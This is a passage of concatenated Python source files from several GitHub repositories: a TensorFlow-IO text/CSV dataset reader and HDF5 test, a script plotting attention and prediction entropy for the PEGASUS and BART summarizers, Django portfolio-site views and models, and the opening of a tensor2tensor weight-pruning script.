filename: A string containing filename to read.
"""
dtype = tf.string
shape = tf.TensorShape([None])
capacity = kwargs.get("capacity", 65536)
if filename.startswith("file://-") or filename.startswith("file://0"):
dataset = data_ops.BaseDataset.range(1).map(
lambda length: core_ops.read_text(filename, memory="", offset=0, length=length)
)
else:
filesize = tf.io.gfile.GFile(filename).size()
# capacity is the rough length for each split
entry_offset = list(range(0, filesize, capacity))
entry_length = [
min(capacity, filesize - offset) for offset in entry_offset]
dataset = data_ops.BaseDataset.from_tensor_slices(
(
tf.constant(entry_offset, tf.int64),
tf.constant(entry_length, tf.int64)
)
).map(lambda offset, length: core_ops.read_text(
filename, memory="",
offset=offset, length=length))
self._dataset = dataset
super(TextDataset, self).__init__(
self._dataset._variant_tensor, [dtype], [shape]) # pylint: disable=protected-access
class TextOutputSequence(object):
"""TextOutputSequence"""
def __init__(self, filenames):
"""Create a `TextOutputSequence`.
"""
self._filenames = filenames
self._resource = core_ops.text_output_sequence(destination=filenames)
def setitem(self, index, item):
core_ops.text_output_sequence_set_item(self._resource, index, item)
def _infer_dtype(val):
"""_infer_dtype"""
try:
val = ast.literal_eval(val)
except (SyntaxError, ValueError):
return tf.string
if isinstance(val, int):
if np.int32(val) == val:
return tf.int32
elif np.int64(val) == val:
return tf.int64
elif isinstance(val, float):
if np.float32(val) == val:
return tf.float32
elif np.float64(val) == val:
return tf.float64
return tf.string
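# Behavior sketch of the widening rules above:
#   _infer_dtype("3")    -> tf.int32   (fits in 32 bits)
#   _infer_dtype("1.5")  -> tf.float32 (exactly representable as float32)
#   _infer_dtype("abc")  -> tf.string  (not a Python literal)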
def from_csv(filename, header=0):
"""Read csv to Dataset
NOTE: Experimental and eager only!
Args:
filename: A `tf.string` tensor containing filename.
"""
if not tf.executing_eagerly():
raise NotImplementedError("from_csv only supports eager mode")
dataset = TextDataset(filename).apply(tf.data.experimental.unbatch())
columns = None
if header is not None:
if header != 0:
raise NotImplementedError(
"from_csv only supports header=0 or header=None for now")
# Read the first line as the column names
columns = list(
csv.reader([line.numpy().decode() for line in dataset.take(1)]))[0]
dataset = dataset.skip(1)
entries = list(
csv.reader([line.numpy().decode() for line in dataset.take(1)]))[0]
if columns is None:
columns = [i for (i, _) in enumerate(entries)]
dtypes = [_infer_dtype(column) for column in entries]
specs = [
tf.TensorSpec(tf.TensorShape([]), dtype, column) for (
column, dtype) in zip(columns, dtypes)]
record_defaults = [tf.zeros(spec.shape, spec.dtype) for spec in specs]
return tf.data.experimental.CsvDataset(
filename, record_defaults, header=(header is not None)), specs
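# Usage sketch (eager mode only; "example.csv" is a placeholder for a CSV file whose
# first row holds the column names):
#
#   dataset, specs = from_csv("example.csv", header=0)
#   for record in dataset:
#       pass  # one tensor per column, dtypes inferred from the first data row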
```
#### File: io/tests/test_hdf5_eager.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import tensorflow as tf
if not (hasattr(tf, "version") and tf.version.VERSION.startswith("2.")):
tf.compat.v1.enable_eager_execution()
import tensorflow_io.hdf5 as hdf5_io # pylint: disable=wrong-import-position
def test_hdf5_list_dataset():
"""test_hdf5_list_dataset"""
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"test_hdf5", "h5ex_g_traverse.h5")
# Without file:// file will be opened directly, otherwise
# file will be opened in memory.
for filename in [filename, "file://" + filename]:
specs = hdf5_io.list_hdf5_datasets(filename)
assert specs['/group1/dset1'].dtype == tf.int32
assert specs['/group1/dset1'].shape == tf.TensorShape([1, 1])
assert specs['/group1/group3/dset2'].dtype == tf.int32
assert specs['/group1/group3/dset2'].shape == tf.TensorShape([1, 1])
def test_hdf5_read_dataset():
"""test_hdf5_list_dataset"""
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"test_hdf5", "tdset.h5")
for filename in [filename, "file://" + filename]:
specs = hdf5_io.list_hdf5_datasets(filename)
assert specs['/dset1'].dtype == tf.int32
assert specs['/dset1'].shape == tf.TensorShape([10, 20])
assert specs['/dset2'].dtype == tf.float64
assert specs['/dset2'].shape == tf.TensorShape([30, 20])
p1 = hdf5_io.read_hdf5(filename, specs['/dset1'])
assert p1.dtype == tf.int32
assert p1.shape == tf.TensorShape([10, 20])
for i in range(10):
vv = list([np.asarray([v for v in range(i, i + 20)])])
assert np.all(p1[i].numpy() == vv)
dataset = hdf5_io.HDF5Dataset(filename, '/dset1').apply(
tf.data.experimental.unbatch())
i = 0
for p in dataset:
vv = list([np.asarray([v for v in range(i, i + 20)])])
assert np.all(p.numpy() == vv)
i += 1
if __name__ == "__main__":
tf.test.main()
``` |
{
"source": "jiacheng-xu/text-sum-uncertainty",
"score": 2
} |
#### File: jiacheng-xu/text-sum-uncertainty/attention_y_entropy.py
```python
import itertools
import os, random
import statistics
import matplotlib
import matplotlib.pyplot as plt
from analyze_entropy import comp_entropy
from analyze_prob_attn import compute_idf, get_ban_positions
# from data_collection import CUR_DIR, PROB_META_DIR, spec_name, MODEL_NAME, DATA_NAME
from util import convert_enc_attn, parse_arg
from matplotlib.ticker import (MultipleLocator, FormatStrFormatter,
AutoMinorLocator)
font_size = 14
matplotlib.font_manager._rebuild()
GLOBAL_FIGURE_WIDTH = 8
dpi = 800
# plt.rcParams["font.weight"] = "light"
plt.rcParams.update({'font.size': 14})
plt.rcParams['font.family'] = 'DejaVu Sans'
dir_datadrive = '/mnt/data0/jcxu/data/prob_gpt'
# Density: x: entropy, two plots: is bigram or not
FIG_SIZE_x = GLOBAL_FIGURE_WIDTH
def get_ys(t, logits, BOS_token=0):
# for one time step, get the tokens last_inp, cur_inp, cur_pred, and next_pred
cur_pred = logits[t]
try:
next_pred = logits[t + 1]
except IndexError:
next_pred = None
if t - 2 >= 0:
last_inp = logits[t - 2]
elif t - 2 == -1:
last_inp = BOS_token
else:
last_inp = None
if t - 1 >= 0:
cur_inp = logits[t - 1]
elif t - 1 == -1:
cur_inp = BOS_token
else:
cur_inp = None
return last_inp, cur_inp, cur_pred, next_pred
from collections import Counter
def truncate_attention_cell(attn_distb, input_doc, idf_ban_pos, tgt_prob_mass=0.9) -> Counter:
# for each attention distribution, remove the idf ban tokens (positions), get the accumulated prob up to prob_mass.
# return
sorts = np.argsort(attn_distb, axis=-1, kind=None, order=None)[::-1]
cum_prob_mass = 0
cnt = Counter()
for topk in sorts:
prob_mass = attn_distb[topk]
cum_prob_mass += prob_mass
if topk not in idf_ban_pos:
cnt[input_doc[topk]] = prob_mass
if cum_prob_mass > tgt_prob_mass or prob_mass < 0.01:
break
return cnt
def _y_entropy_step(attn_lle, input_doc, idf_ban_pos):
num_layer, num_head, src_len = attn_lle.shape
all_attns = Counter()
for l in range(num_layer):
for h in range(num_head):
cell_attn = truncate_attention_cell(attn_lle[l][h], input_doc, idf_ban_pos=idf_ban_pos)
all_attns = all_attns + cell_attn
return all_attns
def retrieve_tok_val(cnter, token):
try:
v = cnter[token]
except:
v = 0
return v
import matplotlib
import matplotlib.pyplot as plt
def plot_hist(val_ent_pairs, title):
weights = [p[0] for p in val_ent_pairs]
xs = [p[1] for p in val_ent_pairs]
plt.hist(xs, bins=20, weights=weights, density=True)
plt.xlabel('Pred Ent')
plt.ylabel('Cum Attn')
plt.title(title)
plt.grid(True)
plt.show()
import seaborn as sns
def get_statistics(matrix):
result = [0 for _ in range(len(matrix))]
for idx, row in enumerate(matrix):
try:
m = statistics.mean(row)
except:
m = 0
print("NO DATA!")
result[idx] = m
return result
def proceed_data(segs, val_ent_pairs, step_size=0.5):
cat_bins = [[[] for _ in range(segs)] for _ in range(5)]
for p in val_ent_pairs:
last_inp, cur_inp, cur_pred, next_pred, pred_ent, atte_ent = p
# attn_val, ent, attn_e = p[0], p[1], p[2]
cat = int(pred_ent // step_size)
try:
cat_bins[0][cat].append(last_inp)
cat_bins[1][cat].append(cur_inp)
cat_bins[2][cat].append(cur_pred)
cat_bins[3][cat].append(next_pred)
cat_bins[4][cat].append(atte_ent)
except:
pass
last_inp_mean = get_statistics(cat_bins[0])
cur_inp_mean = get_statistics(cat_bins[1])
cur_pred_mean = get_statistics(cat_bins[2])
next_pred_mean = get_statistics(cat_bins[3])
atte_ent_mean = get_statistics(cat_bins[4])
return last_inp_mean, cur_inp_mean, cur_pred_mean, next_pred_mean, atte_ent_mean
def read_stack_data(last_inp_mean, cur_inp_mean, cur_pred_mean, next_pred_mean, seps=10):
bar0 = last_inp_mean
bar1 = cur_inp_mean
bar2 = cur_pred_mean
bar3 = next_pred_mean
from operator import add
bar01 = np.add(bar0, bar1).tolist()
bar012 = np.add(bar01, bar2).tolist()
# x = list(range(10))
return bar0, bar1, bar2, bar3, bar01, bar012
def plot_single_line(this_fig, spec_config, input_data, step_size=0.5, ent_max=5,
show_x_ticks=False, show_y_ticks=True, data_name="", model_name="", ymin=2, ymax=5):
segs = np.arange(0, ent_max, step_size).tolist()
# colorblind = sns.color_palette("coolwarm", 10)[::-1]
last_inp_mean, cur_inp_mean, cur_pred_mean, next_pred_mean, atte_ent_mean = input_data
axes = this_fig.add_subplot(spec_config)
sns.lineplot(x=list(np.arange(0, 5, step_size)), y=atte_ent_mean, markers=True, dashes=False)
# axes = sns.boxplot(x=x, y=y, palette=colorblind, showfliers=False)
axes.xaxis.set_major_locator(MultipleLocator(1))
axes.xaxis.set_major_formatter(FormatStrFormatter('%d'))
# For the minor ticks, use no labels; default NullFormatter.
axes.xaxis.set_minor_locator(MultipleLocator(0.5))
# axes.get_ylim()
# axes.set_ylim(ymin, ymax)
if show_x_ticks:
# x_vals = [m * step_size for m in xticks]
# axes.set_xticklabels(x_vals, rotation='vertical')
pass
else:
plt.setp(axes.get_xticklabels(), visible=False)
# if not show_y_ticks:
# plt.setp(axes.get_yticklabels(), visible=False)
if data_name != "":
axes.set_ylabel(data_name)
else:
axes.set_ylabel("")
if model_name != "":
axes.set_title(model_name)
return axes
def plot_single_box(this_fig, spec_config, input_data, step_size=0.5, ent_max=5,
show_x_ticks=False, show_y_ticks=True, ylim=0.8, data_name="", model_name="", show_legend=False):
segs = np.arange(0, ent_max, step_size).tolist()
# colorblind = sns.color_palette("coolwarm", 10)[::-1]
last_inp_mean, cur_inp_mean, cur_pred_mean, next_pred_mean, atte_ent_mean = input_data
bar0, bar1, bar2, bar3, bar01, bar012 = read_stack_data(last_inp_mean, cur_inp_mean, cur_pred_mean, next_pred_mean)
colorblind = sns.color_palette("coolwarm", 4)
# colorblind = sns.color_palette("Set2")
# colorblind = sns.color_palette()
catnames = ['$y_{t-2}$', '$y_{t-1}$',
'$y_{t}$', '$y_{t+1}$']
linewidth = 1.5
axes = this_fig.add_subplot(spec_config)
x = list(np.arange(0, 5, 0.5))
axes.bar(x, bar0, color=colorblind[0],
# edgecolor=colorblind[0],linewidth=linewidth,
label=catnames[0], width=step_size,
# hatch='/'
)
axes.bar(x, bar1, bottom=bar0,
# edgecolor='white', linewidth=1,
label=catnames[1], width=step_size,
# hatch='-',
facecolor=colorblind[1],
# histtype='step', facecolor='g',
# alpha=0.75
# ,hatch='-'
)
axes.bar(x, bar2, bottom=bar01,
# edgecolor=colorblind[3], linewidth=0,
label=catnames[2], width=step_size, facecolor=colorblind[3],
# histtype='step',
# hatch='|'
# ,hatch='|'
)
axes.bar(x, bar3, bottom=bar012, color=colorblind[2], label=catnames[3], width=step_size,
# edgecolor=colorblind[2], linewidth=linewidth,
# hatch='\\'
)
# axes = sns.boxplot(x=x, y=y, palette=colorblind, showfliers=False)
axes.xaxis.set_major_locator(MultipleLocator(1))
axes.xaxis.set_major_formatter(FormatStrFormatter('%d'))
if show_legend:
axes.legend(ncol=2, frameon=False)
# For the minor ticks, use no labels; default NullFormatter.
axes.xaxis.set_minor_locator(MultipleLocator(0.5))
axes.set_ylim(0, ylim)
if show_x_ticks:
# x_vals = [m * step_size for m in xticks]
# axes.set_xticklabels(x_vals, rotation='vertical')
pass
else:
plt.setp(axes.get_xticklabels(), visible=False)
if not show_y_ticks:
plt.setp(axes.get_yticklabels(), visible=False)
if data_name != "":
axes.set_ylabel(data_name)
else:
axes.set_ylabel("")
if model_name != "":
axes.set_title(model_name)
return axes
def plot_box(val_ent_pairs, title=None, step_size=.25):
# max_pred_ent = max([p[1] for p in val_ent_pairs])
# segs = np.linspace(0, max_pred_ent + 0.1, num=20).tolist()
segs = np.arange(0, 8, step_size).tolist()
colorblind = sns.color_palette("coolwarm", 10)[::-1]
bins = [[] for _ in range(len(segs))]
x, y = [], []
for p in val_ent_pairs:
v, ent = p[0], p[1]
cat = int(ent // step_size)
try:
bins[cat].append(v)
x.append(cat)
y.append(v)
except:
pass
fig1, ax1 = plt.subplots()
ax1.set_title(title)
ax1 = sns.violinplot(x=x, y=y, cut=0, palette=colorblind, inner='quartile')
# ax1.set_xticks( np.arange(0, 8, step_size).tolist())
# ax1.set_xticklabels(np.arange(0, 8, step_size).tolist())
return ax1
def plot_single_scatter(val_ent_pairs, title):
y_attn_frac = [m[0] for m in val_ent_pairs]
x_pred_ent = [m[1] for m in val_ent_pairs]
ax = sns.jointplot(x=x_pred_ent, y=y_attn_frac, kind="hex", color="#4CB391")
# ax = sns.scatterplot(x=x_pred_ent,y=y_attn_frac)
#
# sns.histplot(x=x_pred_ent, y=y_attn_frac, bins=50, pthresh=.1, cmap="mako")
# sns.kdeplot(x=x_pred_ent, y=y_attn_frac, levels=5,linewidths=1)
# ax.set_title(title)
plt.show()
return ax
def analyze_attention_y_entropy(max_time_step, attn_tlle, pred_distribution, input_doc, ban_positions, logits, nuc,
top_p):
# T = attn_tlle.shape[0]
# data_pairs = [[], [], [], []]
data = []
for t in range(max_time_step):
try:
t_pred_ent = comp_entropy(pred_distribution[t], nuc, top_p)
last_inp, cur_inp, cur_pred, next_pred = get_ys(t, logits)
all_attns_counter = _y_entropy_step(attn_tlle[t], input_doc, ban_positions)
total_attn_val = sum(all_attns_counter.values())
all_attention = list(all_attns_counter.values())
np_attn = np.asarray(all_attention) / total_attn_val
attn_ent = comp_entropy(np_attn)
last_inp_val = retrieve_tok_val(all_attns_counter, last_inp)
cur_inp_val = retrieve_tok_val(all_attns_counter, cur_inp)
cur_pred_val = retrieve_tok_val(all_attns_counter, cur_pred)
next_pred_val = retrieve_tok_val(all_attns_counter, next_pred)
# data_pairs[0].append((last_inp_val / total_attn_val, t_pred_ent))
# data_pairs[1].append((cur_inp_val / total_attn_val, t_pred_ent))
# data_pairs[2].append((cur_pred_val / total_attn_val, t_pred_ent))
data.append((last_inp_val / total_attn_val, cur_inp_val / total_attn_val,
cur_pred_val / total_attn_val, next_pred_val / total_attn_val,
t_pred_ent, attn_ent))
except:
pass
# data_pairs[3].append((next_pred_val / total_attn_val, t_pred_ent))
return data
import pickle
import numpy as np
from scipy.stats import entropy
import matplotlib.gridspec as gridspec
import multiprocessing
def detect_useless_ids(indices):
last = -100
good_indices = []
for x in indices:
if x - 5 > last:
last = x
good_indices.append(x)
else:
break
return good_indices
def process_data_single(args, f, eos_token_ids):
print("running")
BOS_TOKEN = 0
with open(os.path.join(args.cur_dir, f), 'rb') as fd:
data = pickle.load(fd)
attentions, pred_distb, logits, input_doc = data['attentions'], data['pred_distributions'], data['logits'], \
data['input_doc']
timesteps = len(attentions)
attentions_tlle = convert_enc_attn(attentions, merge_layer_head=False) # T,L,L,E
attention_tle = convert_enc_attn(attentions, merge_layer_head=True) # T,L,E
document_len = input_doc.shape[0]
input_doc = input_doc.astype(np.int).tolist()
logits = logits.tolist()
indices = [i for i, x in enumerate(logits) if x in eos_token_ids]
good_indices = detect_useless_ids(indices)
if good_indices:
max_t = good_indices[-1]
else:
max_t = attentions_tlle.shape[0]
# dec_inp_logits = [BOS_TOKEN] + logits[:-1]
pred_distb = np.exp(pred_distb) # time step, vocab size
# pred_ent = entropy(pred_distb, axis=-1)
idf_flag = compute_idf(attention_tle[:max_t]) # E
ban_positions = get_ban_positions(idf_flag)
# ban_positions = []
data_pairs = analyze_attention_y_entropy(max_t, attentions_tlle, pred_distb, input_doc, ban_positions, logits,
args.nucleus, args.nuc_prob)
return data_pairs
from itertools import product
def plot_stack_vocab(cnndm_peg, xsum_peg, cnndm_bart, xsum_bart):
fig = plt.figure(figsize=(FIG_SIZE_x, FIG_SIZE_x - 4))
spec2 = gridspec.GridSpec(ncols=2, nrows=2, figure=fig)
plot_single_box(this_fig=fig, spec_config=spec2[0, 0], input_data=cnndm_peg, show_x_ticks=False,
show_y_ticks=True, data_name="CNN/DM", model_name="PEGASUS", ylim=0.7)
plot_single_box(this_fig=fig, spec_config=spec2[0, 1], input_data=cnndm_bart, show_x_ticks=False,
show_y_ticks=False, model_name="BART", ylim=0.7)
plot_single_box(this_fig=fig, spec_config=spec2[1, 0], input_data=xsum_peg, show_x_ticks=True, show_y_ticks=True,
data_name='XSum', ylim=0.4)
plot_single_box(this_fig=fig, spec_config=spec2[1, 1], input_data=xsum_bart, show_x_ticks=True,
show_y_ticks=False, ylim=0.4, show_legend=True)
fig.text(0.5, 0.01, 'Prediction Entropy', ha='center', fontsize=font_size)
fig.text(0.0, 0.5, 'Vocab Projected Attention', va='center', rotation='vertical', fontsize=font_size)
fig.tight_layout()
plt.savefig(f"x_pred_ent_y_attn_frac.pdf", dpi=dpi, bbox_inches='tight')
plt.show()
plt.close()
def run_one_fig(spec, args, num_samples=300):
print(f"--{spec}--")
CUR_DIR = os.path.join(args.prob_meta_dir, spec)
args.cur_dir = CUR_DIR
files = os.listdir(CUR_DIR)
random.shuffle(files)
files = files[:num_samples]
BOS_TOKEN = 0
print(args.spec_name)
if 'pegasus' in args.model_name:
from transformers import PegasusTokenizer
bpe_tokenizer = PegasusTokenizer.from_pretrained(args.model_name)
EOS_TOK_IDs = [106, bpe_tokenizer.eos_token_id, 2] # <n>
elif 'gpt' in args.model_name:
from transformers import GPT2Tokenizer
bpe_tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
EOS_TOK_IDs = [bpe_tokenizer.eos_token_id]
elif 'bart' in args.model_name:
from transformers import BartTokenizer
bpe_tokenizer = BartTokenizer.from_pretrained(args.model_name)
EOS_TOK_IDs = [bpe_tokenizer.eos_token_id]
else:
raise NotImplementedError
# process_data_single(args, files[0], eos_token_ids=EOS_TOK_IDs)
len_samples = len(files)
cpu_cnt = multiprocessing.cpu_count()
with multiprocessing.Pool(processes=cpu_cnt) as pool:
results = pool.starmap(process_data_single, zip([args] * len_samples, files, [EOS_TOK_IDs] * len_samples))
output = list(itertools.chain.from_iterable(results))
print(f"Samples: {len(output)}")
output = proceed_data(10, output)
return output
def plot_ant_entropy(cnndm_peg, xsum_peg, cnndm_bart, xsum_bart):
fig = plt.figure(figsize=(FIG_SIZE_x, FIG_SIZE_x - 5))
step_size = 0.5
d = {'PEG$_{C}$': cnndm_peg[-1],
'PEG-X': xsum_peg[-1],
'BART-C': cnndm_bart[-1],
'BART-X': xsum_bart[-1],
}
# df = pd.DataFrame(data=d)
ax = fig.add_subplot(1, 1, 1)
# line1 = sns.lineplot(x=list(np.arange(0, 5, step_size)), y=cnndm_peg[-1], label='PEG$_{C}$', markers='x')
plt.plot(list(np.arange(0, 5, step_size)), cnndm_peg[-1], label='PEG$_{C}$', marker='+',
# color='k'
)
plt.plot(list(np.arange(0, 5, step_size)), xsum_peg[-1], label='PEG$_{X}$', marker='x',
# color='k'
)
plt.plot(list(np.arange(0, 5, step_size)), cnndm_bart[-1], label='BART$_{C}$', ls='--', marker='+',
# color='k'
)
plt.plot(list(np.arange(0, 5, step_size)), xsum_bart[-1], label='BART$_{X}$', ls='--', marker='x',
# color='k'
)
plt.legend(loc='best', ncol=2, frameon=False)
# spec2 = gridspec.GridSpec(ncols=2, nrows=2, figure=fig)
# plot_single_line(this_fig=fig, spec_config=spec2[0, 0], input_data=cnndm_peg, show_x_ticks=False,
# show_y_ticks=True, data_name="CNN/DM", model_name="PEGASUS", ymin=2, ymax=4
# )
# plot_single_line(this_fig=fig, spec_config=spec2[0, 1], input_data=cnndm_bart, show_x_ticks=False,
# show_y_ticks=False, model_name="BART", ymin=2, ymax=4)
# plot_single_line(this_fig=fig, spec_config=spec2[1, 0], input_data=xsum_peg, show_x_ticks=True, show_y_ticks=True,
# data_name='XSUM', ymin=2.5, ymax=4)
# plot_single_line(this_fig=fig, spec_config=spec2[1, 1], input_data=xsum_bart, show_x_ticks=True,
# show_y_ticks=False, ymin=2.5, ymax=4)
ax.set_ylabel('Attention Entropy')
ax.set_xlabel('Prediction Entropy')
ax.xaxis.set_major_locator(MultipleLocator(0.5))
# ax.xaxis.set_major_formatter(FormatStrFormatter('%d'))
# For the minor ticks, use no labels; default NullFormatter.
# plt.xaxis.set_minor_locator(MultipleLocator(0.5))
fig.tight_layout()
plt.savefig(f"atten_entropy.pdf", dpi=dpi, bbox_inches='tight')
# fig.text(0.5, 0.01, 'Prediction Entropy', ha='center')
# fig.text(0.0, 0.5, '', va='center', rotation='vertical')
plt.show()
plt.close()
import pandas as pd
if __name__ == '__main__':
args = parse_arg()
print("Looking at attention")
if 'pegasus' in args.model_name:
from transformers import PegasusTokenizer
bpe_tokenizer = PegasusTokenizer.from_pretrained(args.model_name)
EOS_TOK_IDs = [106, bpe_tokenizer.eos_token_id] # <n>
BOS_TOK_ID = 0
else:
raise NotImplementedError
cnndm_peg = "d_cnn_dailymail-m_googlepegasuscnn_dailymail-full1"
xsum_peg = "d_xsum-m_googlepegasusxsum-full1"
cnndm_bart = "d_cnn_dailymail-m_facebookbartlargecnn-full1"
xsum_bart = 'd_xsum-m_facebookbartlargexsum-full1'
xsum_bart_out = run_one_fig(xsum_bart, args)
cnndm_peg_out = run_one_fig(cnndm_peg, args)
xsum_peg_out = run_one_fig(xsum_peg, args)
cnndm_bart_out = run_one_fig(cnndm_bart, args)
# df = pd.DataFrame(data=xsum_bart_out)
# plot_stack_vocab(cnndm_peg_out, xsum_peg_out, cnndm_bart_out, xsum_bart_out)
plot_stack_vocab(cnndm_peg_out, xsum_peg_out, cnndm_bart_out, xsum_bart_out)
plot_ant_entropy(cnndm_peg_out, xsum_peg_out, cnndm_bart_out, xsum_bart_out)
# plot_box(all_data_pairs[0], 'last_inp')
# plot_box(all_data_pairs[1], 'cur_inp')
# plot_box(all_data_pairs[2], 'cur_pred')
# plot_box(all_data_pairs[3], 'next_pred')
``` |
{
"source": "jiachengzhang1/portfolio-web",
"score": 2
} |
#### File: portfolio-web/portfolio_web/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from django.conf import settings
from .models import WebsiteInfo
from .models import Project
from .models import Experience
from .models import Education
months = ["Jan", "Feb", "Mar", "Apr", "May", "June",
"July", "Aug", "Sept", "Oct", "Nov", "Dec"]
default_context = {'analyticsId': settings.GOOGLE_ANALYTICS_ID}
def home(request):
return render(request, 'portfolio_web/pages/home.html', {})
def project(request):
website_info = WebsiteInfo.objects.first()
projects = []
for project in Project.objects.order_by('priority'):
projects.append({
'date': months[project.date.month-1] + ", " + str(project.date.year),
'title': project.title,
'subtitle': project.subtitle,
'content': project.content,
'image': project.image,
'demoURL': project.demoURL,
'codeURL': project.codeURL,
'technologies': [{'name': v.name, 'link': v.link} for v in project.technologies.all()]
})
context = merge_context(default_context, {
'projects': projects,
"page_title": "Project",
'header_paragraph': website_info.portfolioPageHeader if website_info != None else '',
'header': 'PROJECT' if len(projects) == 1 else 'PROJECTS'
})
return render(request, 'portfolio_web/pages/project.html', context)
def experience(request):
website_info = WebsiteInfo.objects.first()
experiences = []
for experience in Experience.objects.order_by('priority'):
start = experience.startDate
end = experience.endDate
period = ""
if start != None and end != None:
period += months[start.month - 1] + " " + str(start.year)
period += " –– "
period += months[end.month - 1] + " " + str(end.year)
elif start == None and end != None:
period += months[end.month - 1] + " " + str(end.year)
elif start != None and end == None:
period += months[start.month - 1] + " " + str(start.year)
period += " –– "
period += "Present"
location = (experience.city + ", " + experience.state)
experiences.append({
'image': experience.image,
'title': experience.title,
'content': experience.content,
'position': experience.position,
'date': period,
'location': location
})
context = merge_context(default_context, {
"experiences":experiences,
"page_title": "Experience",
'header_paragraph': website_info.experiencePageHeader if website_info != None else '',
'header': 'EXPERIENCE' if len(experiences) == 1 else 'EXPERIENCES'
})
return render(request, 'portfolio_web/pages/experience.html', context)
def education(request):
website_info = WebsiteInfo.objects.first()
educations = []
for education in Education.objects.order_by('priority'):
start = education.startDate
end = education.endDate
period = ""
if start != None and end != None:
period += months[start.month - 1] + " " + str(start.year)
period += " –– "
period += months[end.month - 1] + " " + str(end.year)
elif start == None and end != None:
period += months[end.month - 1] + " " + str(end.year)
elif start != None and end == None:
period += months[start.month - 1] + " " + str(start.year)
period += " –– "
period += "Present"
educations.append({
'degree': education.degree,
'content': education.content,
'institution': education.institution,
'city': education.city,
'state': education.state,
'period': period
})
context = merge_context(default_context, {
"educations": educations,
"page_title": "Education",
'header_paragraph': website_info.educationPageHeader if website_info != None else '',
'header': 'EDUCATION' if len(educations) == 1 else 'EDUCATIONS'
})
return render(request, 'portfolio_web/pages/education.html', context)
def contact(request):
website_info = WebsiteInfo.objects.first()
context = merge_context(default_context, {
"page_title": "Contact Me",
'header_paragraph': website_info.contactPageHeader if website_info != None else '',
'header': 'CONTACT ME'
})
return render(request, 'portfolio_web/pages/contact.html', context)
def merge_context(c1, c2):
context = {}
context.update(c1)
context.update(c2)
return context
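# Usage sketch: values from c2 take precedence over c1 for duplicate keys, e.g.
#   merge_context({'a': 1, 'b': 2}, {'b': 3})  ->  {'a': 1, 'b': 3}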
``` |
{
"source": "JiachengZheng/LearnDjango",
"score": 2
} |
#### File: apiproject/api/models.py
```python
from django.db import models
class Category(models.Model):
name = models.CharField(max_length=100)
url = models.CharField(max_length=200)
def __str__(self):
return self.name
class Article(models.Model):
title = models.CharField(max_length=200)
date = models.CharField(max_length=50)
url = models.CharField(max_length=200)
category = models.ForeignKey(Category)
def __str__(self):
return self.title
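# Usage sketch (hypothetical data): Django adds a reverse manager on Category, so the
# articles of a category can be fetched through the default `article_set` accessor.
#
#   category = Category.objects.get(name="python")
#   articles = category.article_set.all()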
``` |
{
"source": "JiachenMao/TransfornerPrune",
"score": 2
} |
#### File: tensor2tensor/bin/t2t_wei_feat_distrib.py
```python
r"""Prune T2TModels using some heuristic.
This code examines the magnitude distribution of the weights and feature maps,
and shows how accuracy drops as the weight sparsity increases.
Target:
if the feature maps (hidden states) are naturally very sparse,
we may be able to apply sparse matrix multiplication directly to accelerate the model.
Example run:
- train a resnet on cifar10:
bin/t2t_trainer.py --problem=image_cifar10 --hparams_set=resnet_cifar_32 \
--model=resnet
- evaluate different pruning percentages using weight-level pruning:
bin/t2t_prune.py --pruning_params_set=resnet_weight --problem=image_cifar10\
--hparams_set=resnet_cifar_32 --model=resnet
"""
import os
from tensor2tensor.bin import t2t_trainer
from tensor2tensor.data_generators import problem as problem_lib # pylint: disable=unused-import
from tensor2tensor.visualization import wei_feat_distrib
from tensor2tensor.utils import registry
from tensor2tensor.utils import t2t_model
from tensor2tensor.utils import trainer_lib
from tensor2tensor.utils import usr_dir
from tensor2tensor.utils import bleu_hook
import tensorflow as tf
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # so the IDs match nvidia-smi
# os.environ["CUDA_VISIBLE_DEVICES"] = "1" # "0, 1" for multiple
flags = tf.flags
FLAGS = flags.FLAGS
# See flags.py for additional command-line flags.
flags.DEFINE_string("pruning_params_set", None,
"Which pruning parameters to use.")
flags.DEFINE_string("log_dir", '',
"log directory.")
# def initialize_from_ckpt(ckpt_dir):
# tf.logging.info("Checkpoint dir: %s", ckpt_dir)
# reader = tf.contrib.framework.load_checkpoint(ckpt_dir)
# variable_map = {}
# for var in tf.contrib.framework.get_trainable_variables():
# var_name = var.name.split(":")[0]
# if reader.has_tensor(var_name):
# tf.logging.info("Loading variable from checkpoint: %s", var_name)
# variable_map[var_name] = var
# else:
# tf.logging.info("Cannot find variable in checkpoint, skipping: %s",
# var_name)
# tf.train.init_from_checkpoint(ckpt_dir, variable_map)
def create_pruning_params():
return registry.pruning_params(FLAGS.pruning_params_set)
def create_pruning_strategy(name):
return registry.pruning_strategy(name)
'''
get the evaluation graph for image classification
'''
def get_eval_graph_image(EstimatorSpec, labels):
preds = EstimatorSpec.predictions["predictions"]
preds = tf.argmax(preds, -1, output_type=labels.dtype)
acc, acc_update_op = tf.metrics.accuracy(labels=labels, predictions=preds)
return acc, acc_update_op
# '''
# get the evaluation graph for translation problem
# '''
# def get_eval_graph_trans(EstimatorSpec, labels):
# preds = EstimatorSpec.predictions["predictions"]
# # outputs = tf.to_int32(tf.argmax(preds, axis=-1))
# outputs = tf.to_int32(tf.argmax(preds, axis=-1))
# # Convert the outputs and labels to a [batch_size, input_length] tensor.
# outputs = tf.squeeze(outputs, axis=[-1, -2])
# labels = tf.squeeze(labels, axis=[-1, -2])
# # bleu, constant = bleu_hook.bleu_score(predictions=preds, labels=labels)
# return outputs, labels, preds
'''
get the evaluation graph for translation problem
'''
def get_eval_graph_trans(EstimatorSpec, labels):
preds = EstimatorSpec.predictions["predictions"]
# outputs = tf.to_int32(tf.argmax(preds, axis=-1))
# outputs = tf.to_int32(tf.argmax(preds, axis=-1))
# # Convert the outputs and labels to a [batch_size, input_length] tensor.
# outputs = tf.squeeze(outputs, axis=[-1, -2])
# labels = tf.squeeze(labels, axis=[-1, -2])
bleu, constant = bleu_hook.bleu_score(predictions=preds, labels=labels)
return bleu
def main(argv):
tf.logging.set_verbosity(tf.logging.INFO)
trainer_lib.set_random_seed(FLAGS.random_seed)
usr_dir.import_usr_dir(FLAGS.t2t_usr_dir)
t2t_trainer.maybe_log_registry_and_exit()
if FLAGS.generate_data:
t2t_trainer.generate_data()
if argv:
t2t_trainer.set_hparams_from_args(argv[1:])
# hparams = t2t_trainer.create_hparams()
